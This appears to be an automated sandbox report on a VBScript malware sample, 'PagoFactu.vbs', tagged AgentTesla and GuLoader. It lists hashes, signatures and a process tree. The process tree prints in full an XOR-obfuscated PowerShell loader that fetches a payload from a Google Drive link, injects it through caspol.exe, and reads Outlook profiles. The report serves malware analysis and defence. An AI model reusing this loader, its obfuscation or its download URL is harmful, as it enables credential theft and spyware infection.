Overview

overview

10

Static

static

1

PagoFactu.vbs

windows7-x64

10

PagoFactu.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    64s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    08-02-2023 18:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PagoFactu.vbs

  • Size

    124KB

  • MD5

    a911fcb381e94db6603ee3bbed255241

  • SHA1

    e388706d286fca439dae5d0e59c446260e29e47e

  • SHA256

    1ef04afb88292cc59711d31f29175aa4ee66f0fb5431c417ad4f02cf3588d935

  • SHA512

    d7112dd62e70c0cabe505aa834d37be53e46e152ca6c06ec9d4314412262fe528d16e6e0d285b29e4acc1ae10d58798567f4bb88a6c747ca65541e575e43eab8

  • SSDEEP

    3072:FXFq3Cj8LqP/D9+y7jP0WCuH4q07guhoK:lFw/mPL9+yXFHv07N

Score
10/10
agentteslaguloadercollectiondownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=1nSKAGzrSWPtToUe3WbRHdqpyZLyve4Tg

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PagoFactu.vbs"
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:872
    • C:\Windows\System32\cmd.exe
      cmd /c echo off
      2⤵
        PID:1328
      • C:\Windows\System32\cmd.exe
        cmd /c echo rshell
        2⤵
          PID:1252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Cockerin = """Function Gerase11 { param([String]`$Bifangedb); `$Parke = ''; Write-Host `$Parke; Write-Host `$Parke; Write-Host `$Parke; `$Cephalor = New-Object byte[] (`$Bifangedb.Length / 2); For(`$Bredbaand=0; `$Bredbaand -lt `$Bifangedb.Length; `$Bredbaand+=2){ `$Cephalor[`$Bredbaand/2] = [convert]::ToByte(`$Bifangedb.Substring(`$Bredbaand, 2), 16); `$Phars = (`$Cephalor[`$Bredbaand/2] -bxor 75); `$Cephalor[`$Bredbaand/2] = `$Phars; } [String][System.Text.Encoding]::ASCII.GetString(`$Cephalor);}`$Syphi0=Gerase11 '1832383F2E26652F2727';`$Syphi1=Gerase11 '062228392438242D3F651C22257879651E25382A2D2E052A3F223D2E062E3F23242F38';`$Syphi2=Gerase11 '0C2E3F1B3924280A2F2F392E3838';`$Syphi3=Gerase11 '1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D';`$Syphi4=Gerase11 '383F3922252C';`$Syphi5=Gerase11 '0C2E3F06242F3E272E032A252F272E';`$Syphi6=Gerase11 '191F183B2E28222A27052A262E676B03222F2E093218222C676B1B3E29272228';`$Syphi7=Gerase11 '193E253F22262E676B062A252A2C2E2F';`$Syphi8=Gerase11 '192E2D272E283F2E2F0F2E272E2C2A3F2E';`$Syphi9=Gerase11 '0225062E2624393206242F3E272E';`$Bilv0=Gerase11 '06320F2E272E2C2A3F2E1F323B2E';`$Bilv1=Gerase11 '08272A3838676B1B3E29272228676B182E2A272E2F676B0A25382208272A3838676B0A3E3F2408272A3838';`$Bilv2=Gerase11 '02253D24202E';`$Bilv3=Gerase11 '1B3E29272228676B03222F2E093218222C676B052E3C1827243F676B1D22393F3E2A27';`$Bilv4=Gerase11 '1D22393F3E2A270A27272428';`$Bilv5=Gerase11 '253F2F2727';`$Bilv6=Gerase11 '053F1B39243F2E283F1D22393F3E2A27062E26243932';`$Bilv7=Gerase11 '020E13';`$Bilv8=Gerase11 '17';`$Retreati=Gerase11 '1E180E197879';`$Pesachbr=Gerase11 '082A27271C22252F243C1B3924280A';function fkp {Param (`$creepm, `$Trylle) ;`$Grnlandsk1500 =Gerase11 '6F182E2A2F396B766B63100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650C2E3F0A38382E262927222E3863626B376B1C232E392E660429212E283F6B306B6F14650C2724292A270A38382E26292732082A28232E6B660A252F6B6F14650724282A3F22242565183B27223F636F0922273D736210667A16650E3A3E2A2738636F18323B23227B626B3662650C2E3F1F323B2E636F18323B23227A62';.(`$Bilv7) `$Grnlandsk1500;`$Grnlandsk1505 = Gerase11 '6F082A2922252E79797D6B766B6F182E2A2F39650C2E3F062E3F23242F636F18323B232279676B101F323B2E1016166B0B636F18323B232278676B6F18323B23227F6262';.(`$Bilv7) `$Grnlandsk1505;`$Grnlandsk1501 = Gerase11 '392E3F3E39256B6F082A2922252E79797D6502253D24202E636F253E2727676B0B63101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D1663052E3C660429212E283F6B1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D6363052E3C660429212E283F6B02253F1B3F3962676B636F182E2A2F39650C2E3F062E3F23242F636F18323B23227E62626502253D24202E636F253E2727676B0B636F28392E2E3B2662626262676B6F1F393227272E6262';.(`$Bilv7) `$Grnlandsk1501;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Supernati,[Parameter(Position = 1)] [Type] `$Swirespiri = [Void]);`$Grnlandsk1502 = Gerase11 '6F093E27272E6B766B100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650F2E2D22252E0F32252A2622280A38382E262927326363052E3C660429212E283F6B1832383F2E2665192E2D272E283F222425650A38382E26292732052A262E636F18323B2322736262676B101832383F2E2665192E2D272E283F222425650E26223F650A38382E26292732093E22272F2E390A28282E3838167171193E2562650F2E2D22252E0F32252A26222806242F3E272E636F18323B232272676B6F2D2A27382E62650F2E2D22252E1F323B2E636F0922273D7B676B6F0922273D7A676B101832383F2E2665063E273F22282A383F0F2E272E2C2A3F2E1662';.(`$Bilv7) `$Grnlandsk1502;`$Grnlandsk1503 = Gerase11 '6F093E27272E650F2E2D22252E082425383F393E283F2439636F18323B23227D676B101832383F2E2665192E2D272E283F22242565082A272722252C0824253D2E253F22242538167171183F2A252F2A392F676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.(`$Bilv7) `$Grnlandsk1503;`$Grnlandsk1504 = Gerase11 '6F093E27272E650F2E2D22252E062E3F23242F636F0922273D79676B6F0922273D78676B6F183C22392E383B223922676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.(`$Bilv7) `$Grnlandsk1504;`$Grnlandsk1505 = Gerase11 '392E3F3E39256B6F093E27272E6508392E2A3F2E1F323B2E6362';.(`$Bilv7) `$Grnlandsk1505 ;}`$Autoh = Gerase11 '202E39252E277879';`$Gerase03 = Gerase11 '0C2E3F0824253824272E1C22252F243C';`$Gerase00=Gerase11 '1823243C1C22252F243C';`$Gerase01 = Gerase11 '6F18272E253F392E3F7C786B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F0C2E392A382E7B7B62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916626B631002253F1B3F3916626262';.(`$Bilv7) `$Gerase01;`$Gerase02 = Gerase11 '6F08232A266B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0C2E392A382E7B7862676B630C0F1F6B0B631002253F1B3F3916626B631002253F1B3F3916626262';.(`$Bilv7) `$Gerase02;`$Grnlandsk1507 = Gerase11 '6F183F222D2D2E6B766B6F08232A266502253D24202E637B62';.(`$Bilv7) `$Grnlandsk1507;`$Grnlandsk1507 = Gerase11 '6F18272E253F392E3F7C786502253D24202E636F183F222D2D2E676B7B62';.(`$Bilv7) `$Grnlandsk1507;`$Grnlandsk1506 = Gerase11 '6F0824262A252F2A253F2E6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0922273D7F62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916676B101E02253F787916676B101E02253F787916626B631002253F1B3F3916626262';.(`$Bilv7) `$Grnlandsk1506;`$Orato = fkp `$Bilv5 `$Bilv6;`$Grnlandsk1507 = Gerase11 '6F082426263E2522312A786B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7D7E7D676B7B33787B7B7B676B7B337F7B62';.(`$Bilv7) `$Grnlandsk1507;`$Grnlandsk1508 = Gerase11 '6F0225283E39386B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7A7F7E737A7C7D7B676B7B33787B7B7B676B7B337F62';.(`$Bilv7) `$Grnlandsk1508;`$Gerase01 = 'https://drive.google.com/uc?export=download&id=1nSKAGzrSWPtToUe3WbRHdqpyZLyve4Tg';`$Gerase00 = Gerase11 '6F03243D2E2F2A203F396B766B63052E3C660429212E283F6B052E3F651C2E290827222E253F62650F243C2527242A2F183F3922252C636F0C2E392A382E7B7A62';`$Grnlandsk1508 = Gerase11 '6F082426263E2522312A79766F2E253D712A3B3B2F2A3F2A';.(`$Bilv7) `$Grnlandsk1508;`$Communiza2=`$Communiza2+'\Fogeych.dat';`$Hovedaktr='';if (-not(Test-Path `$Communiza2)) {while (`$Hovedaktr -eq '') {.(`$Bilv7) `$Gerase00;Start-Sleep 5;}Set-Content `$Communiza2 `$Hovedaktr;}`$Hovedaktr = Get-Content `$Communiza2;`$Grnlandsk1509 = Gerase11 '6F0C3925272A252F38207A7E7B6B766B101832383F2E26650824253D2E393F1671710D392426092A382E7D7F183F3922252C636F03243D2E2F2A203F3962';.(`$Bilv7) `$Grnlandsk1509;`$Hovedaktr0 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7B676B6B6F082426263E2522312A78676B7D7E7D62';.(`$Bilv7) `$Hovedaktr0;`$Gautes=`$Grnlandsk150.count-656;`$Hovedaktr1 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7D7E7D676B6F0225283E3938676B6F0C2A3E3F2E3862';.(`$Bilv7) `$Hovedaktr1;`$Hovedaktr2 = Gerase11 '6F092E38392C6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F1B2E382A2823293962676B630C0F1F6B0B631002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916626B631002253F1B3F3916626262';.(`$Bilv7) `$Hovedaktr2;`$Hovedaktr3 = Gerase11 '6F092E38392C6502253D24202E636F082426263E2522312A78676F0225283E3938676F04392A3F24677B677B62';.(`$Bilv7) `$Hovedaktr3#;""";Function Hovedaktr9 { param([String]$Bifangedb); For($Bredbaand=0; $Bredbaand -lt $Bifangedb.Length-1; $Bredbaand+=(0+1)){$Gerase = $Gerase + $Bifangedb.Substring($Bredbaand, 1)}; $Gerase;}$Spritt0 = Hovedaktr9 'IEX ';$Spritt1= Hovedaktr9 $Cockerin;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Spritt1 ;}else{.$Spritt0 $Spritt1;}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1168
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Gerase11 { param([String]$Bifangedb); $Parke = ''; Write-Host $Parke; Write-Host $Parke; Write-Host $Parke; $Cephalor = New-Object byte[] ($Bifangedb.Length / 2); For($Bredbaand=0; $Bredbaand -lt $Bifangedb.Length; $Bredbaand+=2){ $Cephalor[$Bredbaand/2] = [convert]::ToByte($Bifangedb.Substring($Bredbaand, 2), 16); $Phars = ($Cephalor[$Bredbaand/2] -bxor 75); $Cephalor[$Bredbaand/2] = $Phars; } [String][System.Text.Encoding]::ASCII.GetString($Cephalor);}$Syphi0=Gerase11 '1832383F2E26652F2727';$Syphi1=Gerase11 '062228392438242D3F651C22257879651E25382A2D2E052A3F223D2E062E3F23242F38';$Syphi2=Gerase11 '0C2E3F1B3924280A2F2F392E3838';$Syphi3=Gerase11 '1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D';$Syphi4=Gerase11 '383F3922252C';$Syphi5=Gerase11 '0C2E3F06242F3E272E032A252F272E';$Syphi6=Gerase11 '191F183B2E28222A27052A262E676B03222F2E093218222C676B1B3E29272228';$Syphi7=Gerase11 '193E253F22262E676B062A252A2C2E2F';$Syphi8=Gerase11 '192E2D272E283F2E2F0F2E272E2C2A3F2E';$Syphi9=Gerase11 '0225062E2624393206242F3E272E';$Bilv0=Gerase11 '06320F2E272E2C2A3F2E1F323B2E';$Bilv1=Gerase11 '08272A3838676B1B3E29272228676B182E2A272E2F676B0A25382208272A3838676B0A3E3F2408272A3838';$Bilv2=Gerase11 '02253D24202E';$Bilv3=Gerase11 '1B3E29272228676B03222F2E093218222C676B052E3C1827243F676B1D22393F3E2A27';$Bilv4=Gerase11 '1D22393F3E2A270A27272428';$Bilv5=Gerase11 '253F2F2727';$Bilv6=Gerase11 '053F1B39243F2E283F1D22393F3E2A27062E26243932';$Bilv7=Gerase11 '020E13';$Bilv8=Gerase11 '17';$Retreati=Gerase11 '1E180E197879';$Pesachbr=Gerase11 '082A27271C22252F243C1B3924280A';function fkp {Param ($creepm, $Trylle) ;$Grnlandsk1500 =Gerase11 '6F182E2A2F396B766B63100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650C2E3F0A38382E262927222E3863626B376B1C232E392E660429212E283F6B306B6F14650C2724292A270A38382E26292732082A28232E6B660A252F6B6F14650724282A3F22242565183B27223F636F0922273D736210667A16650E3A3E2A2738636F18323B23227B626B3662650C2E3F1F323B2E636F18323B23227A62';.($Bilv7) $Grnlandsk1500;$Grnlandsk1505 = Gerase11 '6F082A2922252E79797D6B766B6F182E2A2F39650C2E3F062E3F23242F636F18323B232279676B101F323B2E1016166B0B636F18323B232278676B6F18323B23227F6262';.($Bilv7) $Grnlandsk1505;$Grnlandsk1501 = Gerase11 '392E3F3E39256B6F082A2922252E79797D6502253D24202E636F253E2727676B0B63101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D1663052E3C660429212E283F6B1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D6363052E3C660429212E283F6B02253F1B3F3962676B636F182E2A2F39650C2E3F062E3F23242F636F18323B23227E62626502253D24202E636F253E2727676B0B636F28392E2E3B2662626262676B6F1F393227272E6262';.($Bilv7) $Grnlandsk1501;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Supernati,[Parameter(Position = 1)] [Type] $Swirespiri = [Void]);$Grnlandsk1502 = Gerase11 '6F093E27272E6B766B100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650F2E2D22252E0F32252A2622280A38382E262927326363052E3C660429212E283F6B1832383F2E2665192E2D272E283F222425650A38382E26292732052A262E636F18323B2322736262676B101832383F2E2665192E2D272E283F222425650E26223F650A38382E26292732093E22272F2E390A28282E3838167171193E2562650F2E2D22252E0F32252A26222806242F3E272E636F18323B232272676B6F2D2A27382E62650F2E2D22252E1F323B2E636F0922273D7B676B6F0922273D7A676B101832383F2E2665063E273F22282A383F0F2E272E2C2A3F2E1662';.($Bilv7) $Grnlandsk1502;$Grnlandsk1503 = Gerase11 '6F093E27272E650F2E2D22252E082425383F393E283F2439636F18323B23227D676B101832383F2E2665192E2D272E283F22242565082A272722252C0824253D2E253F22242538167171183F2A252F2A392F676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.($Bilv7) $Grnlandsk1503;$Grnlandsk1504 = Gerase11 '6F093E27272E650F2E2D22252E062E3F23242F636F0922273D79676B6F0922273D78676B6F183C22392E383B223922676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.($Bilv7) $Grnlandsk1504;$Grnlandsk1505 = Gerase11 '392E3F3E39256B6F093E27272E6508392E2A3F2E1F323B2E6362';.($Bilv7) $Grnlandsk1505 ;}$Autoh = Gerase11 '202E39252E277879';$Gerase03 = Gerase11 '0C2E3F0824253824272E1C22252F243C';$Gerase00=Gerase11 '1823243C1C22252F243C';$Gerase01 = Gerase11 '6F18272E253F392E3F7C786B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F0C2E392A382E7B7B62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916626B631002253F1B3F3916626262';.($Bilv7) $Gerase01;$Gerase02 = Gerase11 '6F08232A266B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0C2E392A382E7B7862676B630C0F1F6B0B631002253F1B3F3916626B631002253F1B3F3916626262';.($Bilv7) $Gerase02;$Grnlandsk1507 = Gerase11 '6F183F222D2D2E6B766B6F08232A266502253D24202E637B62';.($Bilv7) $Grnlandsk1507;$Grnlandsk1507 = Gerase11 '6F18272E253F392E3F7C786502253D24202E636F183F222D2D2E676B7B62';.($Bilv7) $Grnlandsk1507;$Grnlandsk1506 = Gerase11 '6F0824262A252F2A253F2E6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0922273D7F62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916676B101E02253F787916676B101E02253F787916626B631002253F1B3F3916626262';.($Bilv7) $Grnlandsk1506;$Orato = fkp $Bilv5 $Bilv6;$Grnlandsk1507 = Gerase11 '6F082426263E2522312A786B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7D7E7D676B7B33787B7B7B676B7B337F7B62';.($Bilv7) $Grnlandsk1507;$Grnlandsk1508 = Gerase11 '6F0225283E39386B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7A7F7E737A7C7D7B676B7B33787B7B7B676B7B337F62';.($Bilv7) $Grnlandsk1508;$Gerase01 = 'https://drive.google.com/uc?export=download&id=1nSKAGzrSWPtToUe3WbRHdqpyZLyve4Tg';$Gerase00 = Gerase11 '6F03243D2E2F2A203F396B766B63052E3C660429212E283F6B052E3F651C2E290827222E253F62650F243C2527242A2F183F3922252C636F0C2E392A382E7B7A62';$Grnlandsk1508 = Gerase11 '6F082426263E2522312A79766F2E253D712A3B3B2F2A3F2A';.($Bilv7) $Grnlandsk1508;$Communiza2=$Communiza2+'\Fogeych.dat';$Hovedaktr='';if (-not(Test-Path $Communiza2)) {while ($Hovedaktr -eq '') {.($Bilv7) $Gerase00;Start-Sleep 5;}Set-Content $Communiza2 $Hovedaktr;}$Hovedaktr = Get-Content $Communiza2;$Grnlandsk1509 = Gerase11 '6F0C3925272A252F38207A7E7B6B766B101832383F2E26650824253D2E393F1671710D392426092A382E7D7F183F3922252C636F03243D2E2F2A203F3962';.($Bilv7) $Grnlandsk1509;$Hovedaktr0 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7B676B6B6F082426263E2522312A78676B7D7E7D62';.($Bilv7) $Hovedaktr0;$Gautes=$Grnlandsk150.count-656;$Hovedaktr1 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7D7E7D676B6F0225283E3938676B6F0C2A3E3F2E3862';.($Bilv7) $Hovedaktr1;$Hovedaktr2 = Gerase11 '6F092E38392C6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F1B2E382A2823293962676B630C0F1F6B0B631002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916626B631002253F1B3F3916626262';.($Bilv7) $Hovedaktr2;$Hovedaktr3 = Gerase11 '6F092E38392C6502253D24202E636F082426263E2522312A78676F0225283E3938676F04392A3F24677B677B62';.($Bilv7) $Hovedaktr3#"
            3⤵
            • Blocklisted process makes network request
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1752
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
                PID:1696
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
                4⤵
                • Checks QEMU agent file
                • Accesses Microsoft Outlook profiles
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:1944

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
          Filesize

          61KB

          MD5

          fc4666cbca561e864e7fdf883a9e6661

          SHA1

          2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

          SHA256

          10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

          SHA512

          c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          342B

          MD5

          1b21d0afdeab045ea92e537b35c3fa69

          SHA1

          120273cd41811435511cf864cedf2d3012876840

          SHA256

          98b3354a4d6073afbc83a45377388c20af3a84cae62497e533375de741bb551b

          SHA512

          8c2b7368fcae053e5d03cf87ef97eb33d78e365fe6e8a02a3bae8b66838c8a991e077a8112a668b476014f2762cf54558e6076d62b56e13e0f7348643dc8f40e

          Download Submit
        • memory/872-56-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1168-61-0x000000001B730000-0x000000001BA2F000-memory.dmp
          Filesize

          3.0MB

          Download
        • memory/1168-59-0x000007FEF31A0000-0x000007FEF3BC3000-memory.dmp
          Filesize

          10.1MB

          Download
        • memory/1168-60-0x000007FEF2640000-0x000007FEF319D000-memory.dmp
          Filesize

          11.4MB

          Download
        • memory/1168-62-0x00000000026D4000-0x00000000026D7000-memory.dmp
          Filesize

          12KB

          Download
        • memory/1168-63-0x00000000026DB000-0x00000000026FA000-memory.dmp
          Filesize

          124KB

          Download
        • memory/1168-95-0x00000000026DB000-0x00000000026FA000-memory.dmp
          Filesize

          124KB

          Download
        • memory/1168-57-0x0000000000000000-mapping.dmp
          Download
        • memory/1168-67-0x00000000026D4000-0x00000000026D7000-memory.dmp
          Filesize

          12KB

          Download
        • memory/1168-68-0x00000000026DB000-0x00000000026FA000-memory.dmp
          Filesize

          124KB

          Download
        • memory/1252-55-0x0000000000000000-mapping.dmp
          Download
        • memory/1328-54-0x0000000000000000-mapping.dmp
          Download
        • memory/1752-71-0x0000000076D10000-0x0000000076EB9000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/1752-66-0x0000000072D50000-0x00000000732FB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1752-69-0x0000000005AA0000-0x0000000006888000-memory.dmp
          Filesize

          13.9MB

          Download
        • memory/1752-64-0x0000000000000000-mapping.dmp
          Download
        • memory/1752-76-0x0000000076EF0000-0x0000000077070000-memory.dmp
          Filesize

          1.5MB

          Download
        • memory/1752-77-0x0000000076EF0000-0x0000000077070000-memory.dmp
          Filesize

          1.5MB

          Download
        • memory/1752-78-0x0000000076EF0000-0x0000000077070000-memory.dmp
          Filesize

          1.5MB

          Download
        • memory/1752-93-0x0000000076EF0000-0x0000000077070000-memory.dmp
          Filesize

          1.5MB

          Download
        • memory/1752-80-0x0000000005AA0000-0x0000000006888000-memory.dmp
          Filesize

          13.9MB

          Download
        • memory/1752-92-0x0000000005AA0000-0x0000000006888000-memory.dmp
          Filesize

          13.9MB

          Download
        • memory/1752-65-0x0000000074AD1000-0x0000000074AD3000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1752-70-0x0000000072D50000-0x00000000732FB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1944-85-0x0000000076EF0000-0x0000000077070000-memory.dmp
          Filesize

          1.5MB

          Download
        • memory/1944-88-0x0000000000400000-0x0000000000615000-memory.dmp
          Filesize

          2.1MB

          Download
        • memory/1944-89-0x0000000000401000-0x0000000000615000-memory.dmp
          Filesize

          2.1MB

          Download
        • memory/1944-91-0x0000000000400000-0x0000000000430000-memory.dmp
          Filesize

          192KB

          Download
        • memory/1944-81-0x0000000076D10000-0x0000000076EB9000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/1944-79-0x0000000000620000-0x0000000001408000-memory.dmp
          Filesize

          13.9MB

          Download
        • memory/1944-94-0x0000000000620000-0x0000000001408000-memory.dmp
          Filesize

          13.9MB

          Download
        • memory/1944-75-0x00000000003F768E-mapping.dmp
          Download
        • memory/1944-96-0x0000000076EF0000-0x0000000077070000-memory.dmp
          Filesize

          1.5MB

          Download